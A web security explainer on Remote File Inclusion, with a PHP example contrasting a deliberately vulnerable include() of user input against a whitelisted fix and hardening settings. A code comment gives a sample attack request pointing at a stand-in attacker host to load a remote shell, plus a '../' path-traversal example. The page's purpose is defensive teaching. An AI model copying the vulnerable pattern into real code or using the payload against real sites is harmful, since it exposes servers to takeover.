Is my Site Secure?

Remote File Inclusion

Remote File Inclusion (RFI)

Remote File Inclusion (RFI) is a type of cyber attack that targets web applications which dynamically include external scripts: the attacker abuses the include mechanism to load malware (for example a backdoor shell) from a remote URL on a different domain, one under the attacker's control. Once this has happened, the malicious code can sit in place until the function that references it is executed, at which point it runs and damages the website.

Remote File Inclusion generally occurs when a web application takes the path of the file to be included from user input without properly sanitising it, which allows an external URL to be supplied to the include statement. A successful RFI attack can result in information and file disclosure, server compromise, and control of the site including the ability to modify its content, all of which could be incredibly damaging to both users and website owners.

How can I prevent Remote File Inclusion?

To prevent RFI vulnerabilities from being exploited by an attacker, avoid dynamically including files based on user input, and where dynamic inclusion is needed maintain a whitelist of files that may be included, so that the attacker has no control over what is included.
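As an added example (not code from this page), assuming a PHP application where a `page` query parameter selects which template to render: the vulnerable pattern described above, followed by the whitelist approach, in which the raw request string is never passed to `include`.

```php
<?php
// Added example: the RFI pattern the text describes and its whitelisted fix.
// Assumes a PHP app where ?page=... chooses which template to render.

// --- Vulnerable: user input flows straight into include() ---
// With allow_url_include=On, a request such as
// ?page=http://<attacker host>/shell makes PHP fetch and execute that
// remote file. Even with it Off, the same code still permits local file
// inclusion (e.g. ?page=../../config), so the fix is the same either way.
function render_vulnerable(string $page): void
{
    include $page . '.php';   // DO NOT DO THIS
}

// --- Hardened: map the input to a fixed set of known files ---
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function render_safe(string $page): void
{
    // Lookup by key: the value handed to include() is always one of ours,
    // never the request string, so URLs, stream wrappers and '../' are moot.
    if (!array_key_exists($page, ALLOWED_PAGES)) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    // Anchor to a directory the application controls, not the include_path.
    include __DIR__ . '/pages/' . ALLOWED_PAGES[$page];
}

render_safe($_GET['page'] ?? 'home');
```

As defence in depth, leave `allow_url_include` Off (the PHP default) and disable `allow_url_fopen` where the application does not need it, and log requests whose `page` parameter contains `://` or `..` since the whitelisted code never needs them.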